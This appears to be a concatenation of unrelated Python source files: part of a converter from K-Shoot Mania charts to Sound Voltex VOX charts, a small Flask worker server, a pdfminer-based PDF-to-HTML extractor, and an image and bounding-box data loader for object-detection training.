cell = lambda i: splitted[i].strip()
if param == SpcParam.REALIZE:
if cell(2) == '3':
return cell(4) != '36.12' or cell(5) != '60.12' or cell(6) != '110.12' or cell(7) != '0.00'
elif cell(2) == '4':
return cell(4) != '0.62' or cell(5) != '0.72' or cell(6) != '1.03' or cell(7) != '0.00'
return False
# TODO Other params maybe
class KshFilter(Enum):
def to_vox_filter_id(self):
# TODO Correct this so filter indices line up with the TAB EFFECT INFO instead of being hardcoded
if self == self.PEAK:
return 0
elif self == self.LOWPASS:
return 1 # or 2
elif self == self.HIGHPASS:
return 3 # or 4
elif self == self.BITCRUSH:
return 5
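        # Note: the PEAK branch below is unreachable, since PEAK is already
        # matched by the first branch above; filter id 6 is never returned here.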
elif self == self.PEAK:
# TODO Figure out how effect 6 (and up?) is assigned.
return 6
raise ValueError(f'unrecognized vox filter id {self}')
@classmethod
def from_ksh_name(cls, ksh_name):
if ksh_name == 'peak':
return cls.PEAK
elif ksh_name == 'lpf1':
return cls.LOWPASS
elif ksh_name == 'hpf1':
return cls.HIGHPASS
elif ksh_name == 'bitc':
return cls.BITCRUSH
PEAK = auto()
LOWPASS = auto()
HIGHPASS = auto()
BITCRUSH = auto()
# TODO what uhhhhh the fuck is any of this
class KshEffectDefine:
def __init__(self):
self.effect = None
self.main_param = None
self.params = {}
def define_line(self, index):
param_str = ''
for k, v in self.params.items():
param_str += f';{k}={v}'
return f'#define_fx {index} type={self.effect.to_ksh_simple_name()}{param_str}'
def fx_change(self, index, duration=0):
if self.effect == ksh_effects.KshEffectKind.TAPESTOP:
# Math lol
extra = f';{int(2500 / (duration + 10))}'
else:
extra = f';{self.main_param}' if self.main_param is not None else ''
return f'{index}{extra}'
@classmethod
def from_pre_v4_vox_sound_id(cls, sound_id):
"""Generate an effect definition line from the old-style effect declaration."""
effect = None
main_param = None
from ksh_effects import KshEffectKind as Kind
if sound_id == 2:
effect = Kind.RETRIGGER
main_param = '8'
elif sound_id == 3:
effect = Kind.RETRIGGER
main_param = '16'
elif sound_id == 4:
effect = Kind.GATE
main_param = '16'
elif sound_id == 5:
effect = Kind.FLANGER
main_param = '200'
elif sound_id == 6:
effect = Kind.RETRIGGER
main_param = '32'
elif sound_id == 7:
effect = Kind.GATE
main_param = '8'
elif sound_id == 8:
effect = Kind.PITCHSHIFT
main_param = '8' # TODO Tweak
elif sound_id > 8:
debug().record(Debug.Level.WARNING, 'fx_parse', f'old vox sound id {sound_id} unknown')
return ksh_effects.KshEffect(effect, main_param=main_param) \
if effect is not None and main_param is not None \
else cls.default_effect()
@classmethod
def default_effect(cls):
define = ksh_effects.KshEffect(ksh_effects.KshEffectKind.FLANGER, main_param='200')
define.params['depth'] = f'{define.main_param}samples'
return define
@classmethod
def from_effect_info_line(cls, line):
splitted = line.replace('\t', '').split(',')
if splitted[0] == '1':
return ksh_effects.RetriggerEffect(*splitted[1:])
elif splitted[0] == '2':
return ksh_effects.GateEffect(*splitted[1:])
elif splitted[0] == '3':
return ksh_effects.PhaserEffect(*splitted[1:])
elif splitted[0] == '4':
return ksh_effects.TapestopEffect(*splitted[1:])
elif splitted[0] == '5':
return ksh_effects.SidechainEffect(*splitted[1:])
elif splitted[0] == '6':
return ksh_effects.WobbleEffect(*splitted[1:])
elif splitted[0] == '7':
return ksh_effects.BitcrusherEffect(*splitted[1:])
elif splitted[0] == '8':
return ksh_effects.UpdateableRetriggerEffect(*splitted[1:])
elif splitted[0] == '9':
return ksh_effects.PitchshiftEffect(*splitted[1:])
elif splitted[0] == '11':
return ksh_effects.LowpassEffect(*splitted[1:])
elif splitted[0] == '12':
return ksh_effects.FlangerEffect(*splitted[1:])
else:
raise ValueError(f'effect define id {splitted[0]} is not supported')
class Button(Enum):
def is_fx(self):
return self == Button.FX_L or self == Button.FX_R
@classmethod
def from_track_num(cls, num: int):
try:
return next(x for x in cls if x.value == num)
except StopIteration as err:
if num != 9:
raise ValueError(f'invalid track number for button: {num}') from err
def to_track_num(self):
return self.value
BT_A = 3
BT_B = 4
BT_C = 5
BT_D = 6
FX_L = 2
FX_R = 7
@dataclass()
class ButtonPress:
button: Button
duration: int
effect: int
class LaserSide(Enum):
LEFT = 'l', 1
RIGHT = 'r', 8
def to_letter(self):
return self.value[0]
def to_track_num(self):
return self.value[1]
class LaserCont(Enum):
""" The continuity status of a laser node. """
CONTINUE = 0
START = 1
END = 2
class RollKind(Enum):
MEASURE = 1
HALF_MEASURE = 2
THREE_BEAT = 3
CANCER = 4
SWING = 5
class LaserNode:
@dataclass()
class Builder:
side: LaserSide = None
position: int = None
node_type: LaserCont = None
range: int = 1
filter: KshFilter = KshFilter.PEAK
roll_kind: RollKind = None
def __init__(self, builder: Builder):
self.side: LaserSide = builder.side
self.position: int = builder.position
self.node_cont: LaserCont = builder.node_type
self.range: int = builder.range
self.filter: KshFilter = builder.filter
self.roll_kind: RollKind = builder.roll_kind
if self.position < 0 or self.position > 127:
raise ValueError(f'position {self.position} is out of bounds')
@staticmethod
def position_ksh(position):
""" Convert the position from whatever the hell KSM is using to the 7-bit scale. """
chars = []
for char in range(10):
chars.append(chr(ord('0') + char))
for char in range(24):
chars.append(chr(ord('A') + char))
for char in range(15):
chars.append(chr(ord('a') + char))
idx = chars.index(position)
return (idx / (len(chars) - 1)) * 127
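        # The scale above has 49 symbols ('0'-'9', 'A'-'X', 'a'-'o'), so e.g.
        # position_ksh('0') == 0.0 and position_ksh('o') == 127.0.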
class LaserSlam:
class Direction(Enum):
LEFT = auto()
RIGHT = auto()
def __init__(self, start: LaserNode, end: LaserNode):
self.start: LaserNode = start
self.end: LaserNode = end
if self.start.position == self.end.position:
raise ValueError('attempt to create a slam with the same start and end')
elif self.start.side != self.end.side:
raise ValueError('attempt to create a slam with start and end having different sides')
def direction(self):
if self.start.position > self.end.position:
return self.Direction.LEFT
else:
return self.Direction.RIGHT
def side(self):
return self.start.side
class Difficulty(Enum):
NOVICE = 0, 'n', 'novice', 'nov'
ADVANCED = 1, 'a', 'challenge', 'adv'
EXHAUST = 2, 'e', 'extended', 'exh'
INFINITE = 3, 'i', 'infinite', 'inf'
MAXIMUM = 4, 'm', 'infinite', 'mxm'
@classmethod
def from_letter(cls, k):
return next(x for x in cls if x.value[1] == k)
def to_letter(self):
return self.value[1]
@classmethod
def from_number(cls, num):
try:
return next(x for x in cls if x.value[0] == num)
except StopIteration:
# TODO Error handling.
return None
@classmethod
def from_ksh_name(cls, k):
return next(x for x in cls if x.value[2] == k)
def to_ksh_name(self):
return self.value[2]
def to_xml_name(self):
return self.name.lower()
def to_jacket_ifs_numer(self):
return self.value[0] + 1
def to_abbreviation(self):
return self.value[3]
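    # e.g. Difficulty.from_letter('e') is EXHAUST, whose to_abbreviation() is
    # 'exh'; Difficulty.from_number(4) is MAXIMUM ('mxm').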
class InfiniteVersion(Enum):
INFINITE = 2, 'inf'
GRAVITY = 3, 'grv'
HEAVENLY = 4, 'hvn'
VIVID = 5, 'vvd'
@classmethod
def from_inf_ver(cls, num):
try:
return next(x for x in cls if x.value[0] == num)
except StopIteration:
return None
def to_abbreviation(self):
return self.value[1]
class TiltMode(Enum):
NORMAL = auto()
BIGGER = auto()
KEEP_BIGGER = auto()
def to_vox_id(self):
if self == self.NORMAL:
return 0
elif self == self.BIGGER:
return 1
elif self == self.KEEP_BIGGER:
return 2
@classmethod
def from_ksh_name(cls, ksh_name):
if ksh_name == 'normal':
return cls.NORMAL
elif ksh_name == 'bigger':
return cls.BIGGER
elif ksh_name == 'keep_bigger':
return cls.KEEP_BIGGER
class StopEvent:
moment: Timing
timesig: TimeSignature
class EventKind(Enum):
TRACK = auto()
TIMESIG = auto()
BPM = auto()
TILTMODE = auto()
SPCONTROLLER = auto()
STOP = auto()
class Background:
# As of 2020-01-12, using the definitions from Lasergame.
@staticmethod
def to_vox_id(ksh_id):
if ksh_id == 'techno':
return 0 # or 1, or 14..16, or 71
elif ksh_id == 'wave':
return 2 # or 6, or 11..13
elif ksh_id == 'arrow':
return 3 # or 7
elif ksh_id == 'sakura':
            # TODO It should've been kind of a pink version of 'wave'
return 4 # or 8
elif ksh_id == 'smoke':
return 63
elif ksh_id == 'snow':
return 65
class KshLine:
""" Represents a single line of notes in KSH (along with effect assignment lines) """
class ButtonState(Enum):
NONE = auto()
PRESS = auto()
HOLD = auto()
def __init__(self, line):
buttons, fx, lasers_and_spin = line.split('|')
self.buttons = {}
for bt, state in zip([ Button.BT_A, Button.BT_B, Button.BT_C, Button.BT_D ], buttons):
if state == '2':
self.buttons[bt] = self.ButtonState.HOLD
elif state == '1':
self.buttons[bt] = self.ButtonState.PRESS
else:
self.buttons[bt] = self.ButtonState.NONE
for bt, state in zip([ Button.FX_L, Button.FX_R ], fx):
if state == '1':
self.buttons[bt] = self.ButtonState.HOLD
elif state == '2':
self.buttons[bt] = self.ButtonState.PRESS
else:
self.buttons[bt] = self.ButtonState.NONE
lasers = lasers_and_spin[:2]
spin = lasers_and_spin[2:]
self.lasers = {}
for laser, state in zip([ LaserSide.LEFT, LaserSide.RIGHT ], lasers):
self.lasers[laser] = state
self.spin = spin
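        # Example: KshLine('0120|10|0-') records BT_B as PRESS, BT_C as HOLD,
        # FX_L as HOLD, a left laser at character '0', no right laser, and an
        # empty spin field.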
class Ksh:
def __init__(self):
self.kshfile = None
self.source_file_name = None
self.vox_defines = {} # defined in the vox file
self.ksh_defines = {} # will be defined in the ksh file
self.effect_fallback = KshEffectDefine.default_effect()
self.events = defaultdict(dict)
self.stop_point = None
self.metadata = dict()
self.finalized = False
self.required_chip_sounds = set()
def diff(self):
return Difficulty.from_ksh_name(self.metadata['difficulty'])
def vox_name(self):
title = to_path(self.metadata['title'])
artist = to_path(self.metadata['artist'])
difficulty = Difficulty.from_ksh_name(self.metadata['difficulty']).to_letter()
return f'{title}_{artist}_{difficulty}.vox'
@classmethod
def from_file(cls, path):
global args
parser = Ksh()
file = open(path, 'r')
parser.kshfile = file
parser.source_file_name = os.path.split(path)[-1]
return parser
def parse(self):
line_no = 0
is_metadata = True
now = Timing(1, 1, 0)
timesig = TimeSignature(4, 4)
holds = dict()
for line in self.kshfile:
line_no += 1
debug().current_line_num = line_no
line = line.strip().lstrip('\ufeff') # fucking BOM
if line.startswith('//'):
continue
if line == '--' and is_metadata:
is_metadata = False
if is_metadata:
key, value = line.split('=', 1)
self.metadata[key] = value
continue
if line == '--':
if now.beat != 1 or now.offset != 0:
print('warning: ticks per beat probably incorrect')
now = Timing(now.measure + 1, 1, 0)
elif line.startswith('beat='):
_, sig = line.split('=')
top, bottom = sig.split('/')
timesig = TimeSignature(int(top), int(bottom))
self.events[now][EventKind.TIMESIG] = timesig
elif line.startswith('t='):
_, val = line.split('=')
self.events[now][EventKind.BPM] = float(val)
elif line.startswith('stop='):
_, stop = line.split('=')
self.events[now][EventKind.STOP] = int(stop)
elif line.startswith('tilt='):
_, tilt = line.split('=')
self.events[now][EventKind.TILTMODE] = TiltMode.from_ksh_name(tilt)
#elif SpcParam.from_ksh_name(line.split('=')[0]) is not None:
# raise NotImplementedError('SP Controller things are over my head')
elif '=' in line:
raise KshParseError('what even is a ' + line)
else:
ksh_line = KshLine(line)
slam = False
roll_kind = None
direction = None
if ksh_line.spin != '':
slam = True
roll_kind_code = ksh_line.spin[1]
if roll_kind_code in '()':
roll_kind = RollKind.MEASURE # or something
if roll_kind_code == '(':
direction = LaserSlam.Direction.LEFT
else:
direction = LaserSlam.Direction.RIGHT
elif roll_kind_code in '<>':
roll_kind = RollKind.SWING
if roll_kind_code == '<':
direction = LaserSlam.Direction.LEFT
else:
direction = LaserSlam.Direction.RIGHT
for side in LaserSide:
if ksh_line.lasers[side] not in '-:': # TODO figure out what to do about :
track = side.to_track_num()
laser = LaserNode.Builder()
laser.side = side
laser.position = LaserNode.position_ksh(ksh_line.lasers[side])
laser.node_type = LaserCont.START
if slam:
laser.roll_kind = roll_kind
laser_start = LaserNode(laser)
laser.position += -1 if direction == LaserSlam.Direction.LEFT else 1
laser.node_type = LaserCont.END
laser_end = LaserNode(laser)
event = LaserSlam(laser_start, laser_end) # TODO what uhhh the fuck, TODO persist for later
self.events[now][(EventKind.TRACK, track)] = event
else:
laser = LaserNode(laser)
self.events[now][(EventKind.TRACK, track)] = laser
for button in Button:
if ksh_line.buttons[button] == KshLine.ButtonState.PRESS:
self.events[now][(EventKind.TRACK, button.to_track_num())] = ButtonPress(button, 0, 3) # TODO effects
elif ksh_line.buttons[button] == KshLine.ButtonState.HOLD:
if button not in holds:
holds[button] = now
elif button in holds:
start = holds[button]
event = ButtonPress(button, now.diff(start, timesig), 3) # TODO effects
del holds[button]
self.events[start][(EventKind.TRACK, button.to_track_num())] = event
now = now.add(VOX_TICKS_PER_BEAT // KSH_TICKS_PER_BEAT, timesig)
# TODO effect defines
self.finalized = True
def write_to_vox(self, file=sys.stdout):
def p(*args, **kwargs):
print(*args, **kwargs, file=file)
p('// made by ksh2vox')
p('')
p('#FORMAT VERSION')
p('10')
p('#END')
p('')
p('#BEAT INFO')
for now, events in self.events.items():
if EventKind.TIMESIG in events:
event = events[EventKind.TIMESIG]
p(f'{now.to_time_str()}\t{event.top}\t{event.bottom}')
p('#END')
p('')
p('#BPM INFO')
for now, events in self.events.items():
if EventKind.BPM in events:
# TODO what the fuck is a stop event
bpm = events[EventKind.BPM]
p(f'{now.to_time_str()}\t{bpm}\t4')
p('#END')
p('')
p('#TILT MODE INFO')
for now, events in self.events.items():
if EventKind.TILTMODE in events:
mode = events[EventKind.TILTMODE].to_vox_id()
p(f'{now.to_time_str()}\t{mode}')
p('#END')
p('')
p('#LYRIC INFO')
p('#END')
p('')
p('#END POSITION')
end = max(self.events.keys())
p(f'{end.to_time_str()}')
p('#END')
p('')
p('#TAB EFFECT INFO')
p('1,\t90.00,\t400.00,\t18000.00,\t0.70')
p('1,\t90.00,\t600.00,\t15000.00,\t5.00')
p('2,\t90.00,\t40.00,\t5000.00,\t0.70')
p('2,\t90.00,\t40.00,\t2000.00,\t3.00')
p('3,\t100.00,\t30')
p('#END')
p('')
p('#FXBUTTON EFFECT INFO')
# TODO is this really supposed to be hard coded
p('''1,\t4,\t95.00,\t2.00,\t1.00,\t0.85,\t0.15
0,\t0,\t0,\t0,\t0,\t0,\t0
1,\t8,\t95.00,\t2.00,\t1.00,\t0.75,\t0.10
0,\t0,\t0,\t0,\t0,\t0,\t0
2,\t98.00,\t8,\t1.00
0,\t0,\t0,\t0,\t0,\t0,\t0
3,\t75.00,\t2.00,\t0.50,\t90,\t2.00
0,\t0,\t0,\t0,\t0,\t0,\t0
1,\t16,\t95.00,\t2.00,\t1.00,\t0.87,\t0.13
0,\t0,\t0,\t0,\t0,\t0,\t0
2,\t98.00,\t4,\t1.00
0,\t0,\t0,\t0,\t0,\t0,\t0
1,\t4,\t100.00,\t4.00,\t0.60,\t1.00,\t0.85
0,\t0,\t0,\t0,\t0,\t0,\t0
4,\t100.00,\t8.00,\t0.40
0,\t0,\t0,\t0,\t0,\t0,\t0
5,\t90.00,\t1.00,\t45,\t50,\t60
0,\t0,\t0,\t0,\t0,\t0,\t0
6,\t0,\t3,\t80.00,\t500.00,\t18000.00,\t4.00,\t1.40
0,\t0,\t0,\t0,\t0,\t0,\t0
1,\t6,\t95.00,\t2.00,\t1.00,\t0.85,\t0.15
0,\t0,\t0,\t0,\t0,\t0,\t0
7,\t100.00,\t12
0,\t0,\t0,\t0,\t0,\t0,\t0''')
p('#END')
p('')
p('#TAB PARAM ASSIGN INFO')
# TODO does this number mean anything
for _ in range(24):
p('0,\t0,\t0.00,\t0.00')
p('#END')
p('')
p('#REVERB EFFECT PARAM')
p('#END')
p('')
def laser_track(i):
p('#TRACK' + str(i))
for now, events in self.events.items():
if (EventKind.TRACK, i) in events:
event = events[(EventKind.TRACK, i)]
if isinstance(event, LaserSlam):
lasers = [event.start, event.end]
else:
lasers = [event]
for laser in lasers:
position = int(laser.position)
node_type = laser.node_cont.value
if laser.roll_kind is None:
roll_kind = 0
else:
roll_kind = laser.roll_kind.value
# TODO filter and range
p(f'{now.to_time_str()}\t{position}\t{node_type}\t{roll_kind}')
p('#END')
p('')
def button_track(i):
p('#TRACK' + str(i))
for now, events in self.events.items():
if (EventKind.TRACK, i) in events:
event: ButtonPress = events[(EventKind.TRACK, i)]
duration = int(event.duration)
if event.button.is_fx():
if duration > 0:
fx_data = event.effect + 2
else:
fx_data = event.effect
p(f'{now.to_time_str()}\t{duration}\t{fx_data}')
else:
p(f'{now.to_time_str()}\t{duration}')
p('#END')
p('')
laser_track(1)
button_track(2)
button_track(3)
button_track(4)
button_track(5)
button_track(6)
button_track(7)
laser_track(8)
p('#TRACK AUTO TAB')
p('#END')
p('')
p('#SPCONTROLER') # [sic]
# TODO this probably shouldn't be hardcoded
p('''001,01,00\tAIRL_ScaX\t1\t0\t0.00\t1.00\t0.00\t0.00
001,01,00\tAIRR_ScaX\t1\t0\t0.00\t2.00\t0.00\t0.00
001,01,00\tRealize\t3\t0\t17.12\t60.12\t110.12\t0.00
001,01,00\tRealize\t4\t0\t0.28\t0.72\t1.57\t0.00''')
p('#END')
p('')
def close(self):
self.kshfile.close()
thread_id_index = {}
def thread_print(line):
if threading.get_ident() not in thread_id_index:
thread_id_index[threading.get_ident()] = len(thread_id_index) + 1
print(f'{thread_id_index[threading.get_ident()]}> {line}')
def do_process_kshfiles(files):
global args
# Load source directory.
for ksh_path in files:
try:
debug().state = Debug.State.INPUT
debug().input_filename = ksh_path
debug().output_filename = None
debug().reset()
# noinspection PyBroadException
try:
ksh = Ksh.from_file(ksh_path)
except Exception:
debug().record_last_exception(level=Debug.Level.ERROR, tag='ksh_load')
continue
thread_print(f'Processing "{ksh_path}"')
start_time = time.time()
# First try to parse the file.
try:
ksh.parse()
except Exception as e:
thread_print(f'Parsing ksh file failed with "{str(e)}":\n{traceback.format_exc()}')
debug().record_last_exception(level=Debug.Level.ERROR, tag='ksh_parse', trace=True)
continue
# Make the output directory.
song_dir = f'out/{to_path(ksh.metadata["title"])}'
if not os.path.isdir(song_dir):
thread_print(f'Creating song directory "{song_dir}".')
os.mkdir(song_dir)
# Output the VOX chart.
chart_path = f'{song_dir}/{ksh.vox_name()}'
debug().output_filename = chart_path
debug().state = Debug.State.OUTPUT
thread_print(f'Writing VOX data to "{chart_path}".')
with open(chart_path, "w+", encoding='utf-8') as ksh_file:
try:
ksh.write_to_vox(file=ksh_file)
except Exception as e:
print(f'Outputting to vox failed with "{str(e)}"\n{traceback.format_exc()}\n')
debug().record_last_exception(level=Debug.Level.ERROR, tag='vox_output', trace=True)
continue
duration = time.time() - start_time
if debug().has_issues():
exceptions = debug().exceptions_count
thread_print(f'Finished conversion in {truncate(duration, 4)}s with {exceptions[Debug.Level.ABNORMALITY]} abnormalities, {exceptions[Debug.Level.WARNING]} warnings, and {exceptions[Debug.Level.ERROR]} errors.')
else:
thread_print(f'Finished conversion in {truncate(duration, 4)}s with no issues.')
ksh.close()
except Exception as e:
debug().record_last_exception(Debug.Level.ERROR, 'other', f'an error occurred: {str(e)}')
def debug():
global debugs
if threading.get_ident() not in debugs:
debugs[threading.get_ident()] = Debug(f'debug/exceptions_{threading.get_ident()}.txt')
return debugs[threading.get_ident()]
##############
# PROGRAM RUNTIME BEGINS BELOW
#############
args = None
debugs = {}
def main():
if not os.path.exists('config.ini'):
print('Please create a config.ini based off the provided sample.', file=sys.stderr)
sys.exit(1)
global args
argparser = argparse.ArgumentParser(description='Convert ksh to vox')
argparser.add_argument('-j', '--num-cores', default=1, type=int)
argparser.add_argument('-i', '--song-id')
argparser.add_argument('-d', '--song-difficulty')
argparser.add_argument('-n', '--no-media', action='store_false', dest='do_media')
argparser.add_argument('-m', '--no-convert', action='store_false', dest='do_convert')
argparser.add_argument('-x', '--no-merge-db', action='store_false', dest='multi_db')
argparser.add_argument('-K', '--ksh-dir', default='D:/SDVX-Import/ksh')
argparser.add_argument('-D', '--db-dir', default='D:/SDVX-Import/music_db')
argparser.add_argument('-A', '--audio-dir', default='D:/SDVX-Import/song_prepared')
argparser.add_argument('-C', '--fx-chip-sound-dir', default='D:/SDVX-Import/fx_chip_sound')
argparser.add_argument('-J', '--jacket-dir', default='D:/SDVX-Import/jacket')
argparser.add_argument('-P', '--preview-dir', default='D:/SDVX-Import/preview')
argparser.add_argument('-c', '--clean-output', action='store_true', dest='do_clean_output')
argparser.add_argument('-e', '--clean-debug', action='store_true', dest='do_clean_debug')
args = argparser.parse_args()
# Create output directory.
if args.do_clean_output:
print('Cleaning directory of old charts.')
shutil.rmtree('out')
if not os.path.exists('out'):
print(f'Creating output directory.')
os.mkdir('out')
if args.do_clean_debug:
print('Cleaning directory of debug output.')
shutil.rmtree('debug')
if not os.path.exists('debug'):
print(f'Creating debug output directory.')
os.mkdir('debug')
candidates = []
print(f'Finding ksh files.')
for filename in glob(f'{args.ksh_dir}/*.ksh'):
import re
if args.song_id is None or \
(args.song_id is not None and f'_{args.song_id.zfill(4)}_' in filename):
if args.song_difficulty is None or splitx(filename)[0][-1] == args.song_difficulty:
# See if this is overriding an earlier game's version of the chart.
try:
prev: str = next(filter(lambda n: n.split('_')[1] == filename.split('_')[1] and splitx(n)[0][-1] == splitx(filename)[0][-1], candidates))
if int(prev.split('_')[1]) < int(filename.split('_')[1]):
candidates.remove(prev)
else:
continue
except StopIteration:
# Not clashing with anything.
pass
except (IndexError, ValueError):
# Malformed file name.
pass
candidates.append(filename)
print('The following files will be processed:')
for f in candidates:
print(f'\t{f}')
groups = [[] for _ in range(args.num_cores)]
for i, candidate in enumerate(candidates):
try:
song_id = os.path.basename(candidate).split('_')[1]
groups[int(song_id) % args.num_cores].append(candidate)
except (ValueError, IndexError):
groups[i % args.num_cores].append(candidate)
threads = []
global debugs
for i in range(args.num_cores):
thread = threading.Thread(target=do_process_kshfiles, args=(groups[i],), name=f'Thread-{i}')
threads.append(thread)
print(f'Performing conversion across {args.num_cores} threads.')
for t in threads:
t.start()
for t in threads:
t.join()
for d in debugs.values():
d.close()
if __name__ == '__main__':
main()
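# Example invocation (the script name and paths are placeholders; a config.ini
# must exist next to the script, as checked at the top of main()):
#   python ksh2vox.py -j 4 -K /path/to/ksh -i 1234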
|
main.py
|
import importlib
import os
from functools import partial
from multiprocessing import Process, Queue
from flask import Flask, request
app = Flask("serverfull")
workers = {}
def load_bees_module_names():
exclude = set(["__pycache__"])
bee_modules = filter(
os.path.isdir, [
os.path.join("./bees/", module) for module in os.listdir("./bees/")
]
)
bee_modules = set(map(os.path.basename, bee_modules))
bee_modules = bee_modules.difference(exclude)
return list(bee_modules)
bees = load_bees_module_names()
def bee_loop(handler, inq, outq):
    # Serve requests forever; without the loop the worker process would exit
    # after answering a single request and later calls would block on outq.get().
    while True:
        request = inq.get()
        print("Got request")
        outq.put(handler(request))
def generic_handler(bee_path):
_, inq, outq = workers[bee_path]
print(f"Putting {request.args}")
inq.put(request.args)
return outq.get()
for bee in bees:
bee_path = f"bees.{bee}"
print(f"Importing {bee_path}")
bee_mod = importlib.import_module(bee_path)
bee_mod = importlib.reload(bee_mod) # TODO: be smarter, but who cares
print(f"/bees/{bee} => {bee_mod.handler}")
inq = Queue()
outq = Queue()
proc = Process(target=bee_loop, args=(bee_mod.handler, inq, outq))
proc.start()
workers[bee_path] = [proc, inq, outq]
    app.add_url_rule(f"/bees/{bee}", f"bee.{bee}", partial(generic_handler, bee_path))
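# Usage sketch (assumption: the app is served with `flask run` or any WSGI
# server; bee name, host and port below are placeholders):
#   FLASK_APP=main.py flask run --port 5000
#   curl "http://localhost:5000/bees/<bee_name>?key=value"
# Each request's query args are forwarded to the matching bee process through
# its input queue, and the handler's return value is read back from the output
# queue as the HTTP response.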
|
txt_ext.py
|
# re and time are needed at module scope by countRotated and
# process_without_detect_vertical, so import them here rather than only
# inside extract_pdf_to_html.
import re
import time
from io import BytesIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import HTMLConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
def countRotated(text):
"""Counts the number of ocurrences of '\w\n' in text.
Args:
text (string): text that is going to be processed.
Returns:
int: number of ocurrences
"""
return len(re.findall(r'\w\n', text))
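# Quick sanity check: countRotated("ab\ncd\n") == 2 (two word characters, each
# followed by a newline).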
def process_without_detect_vertical(interpreter, retstr, page, return_dict):
"""Processes page and return in shared variable the number of
countRotated ocurrences.
Args:
interpreter (PDFPageInterpreter): PDFPageInterpreter object.
retstr (BytesIO): BytesIO object.
page (PDFPage): PDFPage object.
return_dict (Manager.dict()): Manager.dict() object.
"""
t_start = time.process_time()
interpreter.process_page(page)
t_elapsed = time.process_time() - t_start
print("elapsed 2: ", t_elapsed)
return_dict[0] = countRotated(retstr.getvalue().decode("utf-8")) + 1
def extract_pdf_to_html(path, check_rotated=False):
    """Extracts text from a PDF document into HTML format.
    When check_rotated is True, each page is processed a second time to
    verify its orientation. If a page appears rotated, it is turned 90
    degrees clockwise and processed again. This can more than double the
    total processing time.
    Args:
        path (string): path to the PDF file.
        check_rotated (bool, optional): check for rotated pages. Defaults to False.
    Returns:
        string: document in HTML format
    """
# Declare PDFMiner variables for extraction (with detect_vertical ON)
_rsrcmgr = PDFResourceManager()
_retstr = BytesIO()
_codec = 'utf-8'
_laparams = LAParams(detect_vertical=True)
_device = HTMLConverter(_rsrcmgr, _retstr, laparams=_laparams)
_file = open(path, 'rb')
_interpreter = PDFPageInterpreter(_rsrcmgr, _device)
_password = '' # Set empty password as default value
_pagenos=set() # empty page set
# Declare PDFMiner variables for extraction (with detect_vertical OFF)
_rsrcmgr_default = PDFResourceManager()
_retstr_default = BytesIO()
_laparams_default = LAParams() # detect_vertical=False
_device_default = HTMLConverter(_rsrcmgr_default, _retstr_default, laparams=_laparams_default)
_interpreter_default = PDFPageInterpreter(_rsrcmgr_default, _device_default)
# Variable where text is going to be stored
_text = b""
if(check_rotated):
        # Process and Manager are only needed for the rotation check; re and
        # time are already imported at module level.
        from multiprocessing import Process, Manager
# Iterate through PDF document pages
for number,page in enumerate(PDFPage.get_pages(_file, _pagenos ,password=_password, check_extractable=True)):
#print("Extracting page: ", number)
rotating = False
# If checking page rotation
if(check_rotated):
# Start to measure time
t_start = time.process_time()
# Analyze with detect_vertical
_interpreter.process_page(page)
# If checking page rotation
if(check_rotated):
# Elapsed time
t_elapsed = time.process_time() - t_start
#print("elapsed 1: ", t_elapsed)
#print("countRotated", countRotated(_retstr.getvalue().decode("utf-8")))
            # Number of occurrences of "rotated characters"
num_occ = countRotated(_retstr.getvalue().decode("utf-8")) + 1
# Set timeout based on elapsed time using detect_vertical processing
_timeout = 5 + t_elapsed * 10
max_timeout = 60 # seconds
_timeout = min(max_timeout, _timeout)
#_timeout = 100000
#print("timeout: ", _timeout)
# Create shared variable
manager = Manager()
return_dict = manager.dict()
# Re-execute page interpreter in another thread
action_process = Process(target=process_without_detect_vertical, args=(_interpreter_default, _retstr_default, page, return_dict,))
action_process.start()
action_process.join(timeout=_timeout)
# If thread is still active
if action_process.is_alive():
# Terminate
action_process.terminate()
action_process.join()
#print("Ran out of time")
rotating = True
else:
                # Get the number of occurrences
num_occ_default = return_dict[0]
#print("num_occ_default", num_occ_default)
# Check if page needs to be rotated
if(num_occ_default / num_occ > 5 and num_occ_default > 100):
rotating = True
if(rotating):
#print("Rotating")
# Clean buffer
_retstr.truncate(0)
_retstr.seek(0)
# Rotate page
page.rotate = (page.rotate+90) % 360
# Analyze again with detect_vertical
_interpreter.process_page(page)
# Append new text
_text += _retstr.getvalue()
# Clean buffers
_retstr.truncate(0)
_retstr.seek(0)
_retstr_default.truncate(0)
_retstr_default.seek(0)
#print("Extraction finished")
_text += b'\n\n'
# Close files
_file.close()
_device.close()
_retstr.close()
return _text.decode("utf-8")
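# Usage sketch (the paths below are placeholders):
#   html = extract_pdf_to_html('document.pdf', check_rotated=True)
#   with open('document.html', 'w', encoding='utf-8') as out:
#       out.write(html)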
|
data.py
|
import cv2
import glob
import os
import multiprocessing
import time
import numpy as np
from utils.generate_priors import generate_priors
from utils.assign_boxes import assign_boxes
from utils.augment import augment
class Data:
def __init__(self, image_dir, label_dir, num_classes, input_size, shapes, assignment_threshold):
self.image_dir = image_dir
self.label_dir = label_dir
self.num_classes = num_classes
self.input_size = input_size
self.assignment_threshold = assignment_threshold
self.priors = generate_priors(image_size=self.input_size, shapes=shapes)
self.size = self.get_size()
def start(self):
self.q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.put, args=(self.q,))
p.start()
def get_paths(self):
paths = []
for bb_path in glob.glob(os.path.join(self.label_dir, '*.txt')):
im_path = os.path.join(self.image_dir, os.path.splitext(os.path.basename(bb_path))[0] + '.jpg')
if os.path.exists(im_path):
paths.append([im_path, bb_path])
return paths
def get_size(self):
return len(self.get_paths())
def put(self, q):
queue_max_size = 1000
paths = []
while True:
if len(paths) == 0:
paths = self.get_paths()
if q.qsize() >= queue_max_size:
time.sleep(0.1)
continue
ix = np.random.randint(0, len(paths))
path = paths.pop(ix)
im_path, bb_path = path
npimg = np.fromfile(im_path, dtype=np.uint8)
img = cv2.imdecode(npimg, cv2.IMREAD_COLOR)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
with open(bb_path) as f:
lines = f.read().splitlines()
boxes = []
for line in lines:
ix, xmin, ymin, xmax, ymax = line.split('\t')
onehot_label = np.eye(self.num_classes)[int(ix)]
box = [float(xmin), float(ymin), float(xmax), float(ymax)] + onehot_label.tolist()
boxes.append(box)
img, boxes = augment(img, boxes, self.input_size)
if len(boxes) == 0:
continue
boxes = np.array(boxes)
assignment = assign_boxes(boxes, self.priors, self.num_classes, self.assignment_threshold)
q.put([img, assignment])
def get(self, batch_size):
x_batch = []
t_batch = []
